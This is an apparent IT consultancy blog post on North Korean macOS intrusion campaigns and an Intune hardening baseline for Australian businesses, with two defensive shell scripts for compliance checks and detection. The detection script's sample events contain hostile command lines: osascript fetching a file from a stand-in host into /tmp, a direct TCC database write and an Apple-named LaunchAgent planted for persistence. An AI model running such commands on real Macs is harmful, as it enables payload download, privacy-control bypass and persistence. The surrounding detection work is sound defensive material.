For years, Australian IT leaders treated macOS as the “quiet corner” of the fleet. A handful of executives and designers on MacBooks, a sprinkle of engineers, and a general assumption that Apple’s built-in protections were enough.
That assumption no longer holds. In April 2026, Microsoft Threat Intelligence publicly dissected a campaign by Sapphire Sleet — a North Korean crew aligned with Lazarus Group — targeting macOS users with a fake Zoom SDK update. A few weeks earlier, Google’s Mandiant team documented UNC1069 dropping seven distinct macOS malware families onto a single victim’s Mac in a coordinated credential and wallet heist.
Two separate DPRK (Democratic People’s Republic of Korea) clusters. Two active macOS intrusion chains. Both relying on social engineering rather than exploits. And both pointing at the same uncomfortable conclusion: Australian organisations running unmanaged or lightly managed Mac fleets are now soft targets for a state-sponsored threat actor.
Our team has been helping mid-market Australian businesses harden their macOS posture through Microsoft Intune, and the recent reporting reinforces why that baseline is no longer optional.
What DPRK Actors Are Actually Doing to Macs in 2026
Ten years ago, the Mac threat landscape was dominated by adware and the occasional supply chain surprise. The DPRK campaigns documented through late 2025 and into 2026 look nothing like that.
Sapphire Sleet’s Zoom SDK lure (April 2026). The attackers pose as recruiters or legitimate contacts on LinkedIn, schedule a “technical interview” on Zoom, and deliver a file named Zoom SDK Update.scpt. macOS opens it in Script Editor by default. Below thousands of blank lines sits a multi-stage chain of curl commands that pull fresh AppleScript payloads, bypass macOS Transparency, Consent and Control (TCC), drop a backdoor named com.apple.cli, and exfiltrate keychains, browser data, Apple Notes, Telegram sessions, and cryptocurrency wallets — all via the Telegram Bot API.
UNC1069’s seven-family ClickFix campaign (February 2026). Mandiant responded to an incident at a fintech where a single victim was contacted over Telegram from a compromised executive account. A deepfake Zoom call was used as the pretext. The user was walked through “troubleshooting” commands that kicked off an AppleScript-driven infection chain dropping WAVESHAPER, HYPERCALL, HIDDENCALL, SILENCELIFT, DEEPBREATH, SUGARLOADER, and CHROMEPUSH. Several of these bypass TCC by modifying the TCC database directly.
Contagious Interview and malicious VS Code projects (January 2026). Jamf Threat Labs and Microsoft Defender researchers documented developers being sent fake “coding assessment” repositories via Bitbucket, GitHub, and GitLab. The repositories abuse VS Code task configuration files to execute payloads on macOS. Separately, North Korean operators pushed nearly 200 malicious npm packages in late November 2025, merging features from the well-known BeaverTail and OtterCookie malware families.
The classic lineage is still active. RustBucket, KandyKorn, ObjCShellz, and BeaverTail remain in circulation, now joined by newer loaders like SUGARLOADER and credential stealers dropped through fake systemupdate.app bundles.
The common thread across all of this is that users — not unpatched software — are the initial access vector. And the payloads are increasingly Mach-O binaries, AppleScript chains, and TCC-bypass techniques designed specifically for Apple Silicon fleets.
Why Australian Mid-Market Organisations Are in Scope
The early DPRK macOS campaigns focused heavily on crypto exchanges and Web3 companies. That is no longer the boundary.
In the Mandiant reporting, UNC1069 has pivoted to financial services, payments, brokerage, and wallet infrastructure. Sapphire Sleet’s current lures target anyone with access to financial data or corporate identity. Lazarus was also linked to Medusa ransomware attacks on a healthcare organisation in the U.S. and European defence companies in the past six months.
For Australian organisations in the 50–500 employee band — law firms, accounting practices, super funds, medtech, fintech, professional services — the attack surface is now:
- Executives and partners on MacBooks with access to financial systems
- Developers and engineers using Macs for anything touching code repositories or CI/CD
- Finance and operations staff with access to banking, payments, or payroll
- Anyone active on LinkedIn who might be approached with a “recruiter” pitch
If any of the above runs on a Mac that is not centrally managed, MDM-enrolled, and covered by a hardened baseline, the organisation is essentially betting on user judgement against a well-resourced state-sponsored adversary. The Australian Signals Directorate (ASD) and the Australian Cyber Security Centre (ACSC) have been increasingly direct on this point through 2025 and into 2026: the Essential 8 applies to every managed endpoint, not just the Windows ones.
The Intune for macOS Baseline Our Team Recommends
Intune has matured significantly as a macOS management plane. The features that matter for the current DPRK threat model are not exotic — they are the baseline controls every managed Mac fleet should already have in place.
1. Enforced MDM enrolment via Apple Business Manager. Automated Device Enrolment (ADE) ensures every Mac — company-owned or contractor-supplied — arrives in the fleet already supervised, with the user unable to remove management. Without this, none of the controls below can be reliably enforced.
2. Compliance policies with FileVault, system integrity, and OS version requirements. Intune compliance policies can require FileVault encryption, minimum macOS version, System Integrity Protection (SIP) enabled, and Gatekeeper set to App Store and identified developers only. Non-compliant devices can then be blocked from Microsoft 365 and other Entra-integrated apps through Conditional Access.
3. Platform Single Sign-On with Entra ID. Platform SSO binds the macOS local account to Entra ID, enforces phishing-resistant authentication, and makes credential theft from the keychain far less valuable. Given that DEEPBREATH and CHROMEPUSH both target keychain and browser credentials, Platform SSO is one of the highest-leverage controls available right now.
4. Microsoft Defender for Endpoint on Mac. Defender for Endpoint provides EDR telemetry, behavioural detection, and integration with Microsoft 365 Defender. It catches the kinds of post-compromise behaviours — suspicious osascript execution, curl fetching Mach-O binaries, TCC database tampering — that XProtect alone will miss. Apple has pushed XProtect signatures for the Sapphire Sleet families, but signature-based detection is not a substitute for EDR on a business-critical device.
5. App allow-listing and script execution controls. Intune shell script deployment combined with configuration profiles can restrict where unsigned scripts execute, enforce notarisation requirements, and disable Script Editor for standard users where business use does not require it. This directly disrupts the Zoom SDK Update.scpt style lure.
6. Hardened TCC and privacy preference profiles. Intune configuration profiles can pre-approve only the TCC permissions required by sanctioned apps and prevent users from granting Full Disk Access, Accessibility, or Screen Recording privileges to arbitrary binaries. This is the single most effective control against the TCC-bypass techniques used by DEEPBREATH and the Sapphire Sleet payload chain.
7. Developer workstation separation. Macs used by developers should be treated as a distinct device group with stricter controls on VS Code extensions, source control clients, and package manager behaviour. Given the npm and VS Code project lures documented in the Contagious Interview campaigns, this is no longer a theoretical concern.
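The compliance checks in item 2 above are the kind of signals a shell script deployed through Intune can evaluate on the device. The script below is an added example, not code from the original post and not an Intune-supplied script. It assumes a minimum macOS version of 14.6 (set `MIN_OS` to your own policy value), parses the output of `fdesetup status`, `csrutil status`, `spctl --status` and `sw_vers -productVersion`, and emits one JSON object; the JSON key names are an assumption and must match whatever your compliance settings expect. When it is not running on macOS it falls back to constructed sample outputs so the parsing logic can be exercised anywhere.

```shell
#!/bin/bash
# Added example: device-side compliance signals for a Mac baseline
# (FileVault, SIP, Gatekeeper, minimum OS version). Not the page's or
# Intune's own code; JSON key names are an assumption.

MIN_OS="${MIN_OS:-14.6}"   # assumed minimum macOS version; set per your policy

# Constructed sample outputs, used only when not running on macOS (e.g. in CI).
SAMPLE_FDESETUP="FileVault is On."
SAMPLE_CSRUTIL="System Integrity Protection status: enabled."
SAMPLE_SPCTL="assessments enabled"
SAMPLE_OSVER="14.7.1"

# Each parser takes the raw command output and succeeds only on the compliant state.
filevault_on() { case "$1" in *"FileVault is On"*) return 0 ;; *) return 1 ;; esac; }

# A "Custom Configuration" SIP state means parts of SIP are off; treat it as non-compliant.
sip_enabled() {
  case "$1" in
    *"Custom Configuration"*) return 1 ;;
    *"status: enabled"*)      return 0 ;;
    *)                        return 1 ;;
  esac
}

gatekeeper_on() { case "$1" in *"assessments enabled"*) return 0 ;; *) return 1 ;; esac; }

# version_ge A B: succeed when dotted version A >= B, compared numerically per component.
version_ge() {
  awk -v a="$1" -v b="$2" 'BEGIN {
    n = split(a, x, "."); m = split(b, y, ".")
    len = (n > m) ? n : m
    for (i = 1; i <= len; i++) {
      xi = (i <= n) ? x[i] + 0 : 0
      yi = (i <= m) ? y[i] + 0 : 0
      if (xi > yi) exit 0
      if (xi < yi) exit 1
    }
    exit 0
  }'
}

# bool CMD ARGS...: print "true"/"false" from a command's exit status (for JSON output).
bool() { if "$@"; then echo true; else echo false; fi; }

# Gather raw signals: real commands on macOS, constructed samples elsewhere.
collect_signals() {
  if [ "$(uname)" = "Darwin" ]; then
    FDE_OUT=$(fdesetup status 2>/dev/null)
    SIP_OUT=$(csrutil status 2>/dev/null)
    GK_OUT=$(spctl --status 2>/dev/null)
    OS_VER=$(sw_vers -productVersion)
  else
    FDE_OUT=$SAMPLE_FDESETUP; SIP_OUT=$SAMPLE_CSRUTIL
    GK_OUT=$SAMPLE_SPCTL;     OS_VER=$SAMPLE_OSVER
  fi
}

# compliance_json FDE SIP GK OSVER MIN_OS: one JSON object for the compliance engine.
compliance_json() {
  printf '{"FileVaultOn":%s,"SIPEnabled":%s,"GatekeeperOn":%s,"OSVersion":"%s","OSVersionOK":%s}\n' \
    "$(bool filevault_on "$1")" "$(bool sip_enabled "$2")" \
    "$(bool gatekeeper_on "$3")" "$4" "$(bool version_ge "$4" "$5")"
}

# all_compliant FDE SIP GK OSVER MIN_OS: exit 0 only when every check passes.
all_compliant() {
  filevault_on "$1" && sip_enabled "$2" && gatekeeper_on "$3" && version_ge "$4" "$5"
}

collect_signals
compliance_json "$FDE_OUT" "$SIP_OUT" "$GK_OUT" "$OS_VER" "$MIN_OS"
```

The per-check functions are deliberately separate from the command invocations so the parsing can be tested off-device; the Conditional Access side of item 2 then acts on the reported state rather than on anything the user asserts.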
Mapped against the Essential 8, this baseline directly strengthens the application control, restrict administrative privileges, patch applications, patch operating systems, and multi-factor authentication strategies on macOS — historically the platform where Essential 8 implementations have been weakest in Australian mid-market environments.
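Item 4 above lists the post-compromise behaviours an EDR should surface: osascript spawning a shell download, curl writing a payload to a temporary path, direct writes to the TCC database, and a persistence item under a user's LaunchAgents carrying an Apple-looking name. The script below is an added example, not from the original post and not Microsoft's or Apple's code, that runs those four heuristics over a constructed, pipe-delimited process-event feed (`timestamp|user|parent|process|command line`, an assumed format) so the logic can be checked offline. In a Defender for Endpoint deployment the same conditions would be written as advanced hunting queries over process events rather than as a shell script.

```shell
#!/bin/bash
# Added example: heuristic detections for the macOS behaviours named in item 4.
# Event format is assumed: timestamp|user|parent|process|cmdline (one per line).

# Constructed sample events (not real telemetry). Lines 1, 2, 4 and 5 should fire;
# the chmod, git and API health-check lines are benign noise.
sample_events() {
  cat <<'EOF'
2026-04-14T09:12:03Z|jsmith|Script Editor|osascript|osascript -e 'do shell script "curl -s https://example.invalid/s2 -o /tmp/.u"'
2026-04-14T09:12:05Z|jsmith|osascript|curl|curl -s https://example.invalid/s2 -o /tmp/.u
2026-04-14T09:12:06Z|jsmith|osascript|chmod|chmod +x /tmp/.u
2026-04-14T09:12:09Z|jsmith|sh|sqlite3|sqlite3 "/Users/jsmith/Library/Application Support/com.apple.TCC/TCC.db" "<redacted statement>"
2026-04-14T09:12:10Z|jsmith|sh|cp|cp /tmp/com.apple.cli.plist /Users/jsmith/Library/LaunchAgents/com.apple.cli.plist
2026-04-14T09:30:00Z|jsmith|Terminal|git|git pull origin main
2026-04-14T09:31:00Z|jsmith|Terminal|curl|curl -s https://api.example.invalid/health
EOF
}

# scan_events: read events on stdin, print "timestamp process rule [rule...]" for each hit.
scan_events() {
  awk -F'|' '
  {
    proc = $4; cmd = $5; hits = ""
    # 1. osascript running a shell download (the .scpt lure pattern)
    if (proc == "osascript" && cmd ~ /curl|do shell script/)
      hits = hits "osascript-spawns-shell-download "
    # 2. curl saving its output under /tmp or /private/tmp
    if (proc == "curl" && cmd ~ /-o[ =]+\/(private\/)?tmp\//)
      hits = hits "curl-download-to-tmp "
    # 3. anything other than tccd touching the TCC database by path
    if (cmd ~ /TCC\.db/ && proc != "tccd")
      hits = hits "tcc-db-direct-write "
    # 4. a com.apple.* LaunchAgent placed in a user home; Apple ships none there
    if (cmd ~ /\/Users\/[^ ]*\/Library\/LaunchAgents\/com\.apple\./)
      hits = hits "apple-named-user-launchagent "
    if (hits != "") print $1, proc, hits
  }'
}

# count_flagged: number of events that matched at least one rule.
count_flagged() { scan_events | wc -l | tr -d ' '; }

sample_events | scan_events
```

These rules are intentionally narrow so they can be read in one sitting; admin tooling that legitimately scripts TCC or stages files in /tmp will trip rules 2 and 3, so tune the allow-list against your own fleet's baseline before paging on them.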
Practical Starting Point
The organisations our team works with typically fall into one of three postures on macOS:
- No management — Macs purchased through a reseller or direct, handed to users, no enrolment. This is where most breaches happen.
- Light management — JAMF or Kandji in place for provisioning, but no Conditional Access, no Defender for Endpoint, no Platform SSO, and no alignment with the Essential 8.
- Full Intune baseline — ABM + ADE, compliance policies, Conditional Access, Defender for Endpoint, Platform SSO, hardened TCC profiles, and monitored through Microsoft 365 Defender.
Moving from posture one or two to a full baseline is not a six-month transformation programme. For a 50–500 person organisation, it is typically a focused engagement of a few weeks to get the core controls in place, followed by ongoing hardening as new Intune capabilities land.
The DPRK threat actors are not going to slow down. Social engineering is, as Microsoft’s global threat intelligence GM recently put it, “low-cost, hard to patch, and scales well.” Australian organisations that get their macOS baseline in order now are the ones that will not be the next case study.
If your organisation runs macOS devices and you are not sure how your current controls map to the Essential 8 or stand up against the current DPRK threat model, we would welcome a conversation. Our team regularly helps Australian mid-market organisations design and deploy Intune for macOS baselines aligned with ACSC guidance and the Essential 8.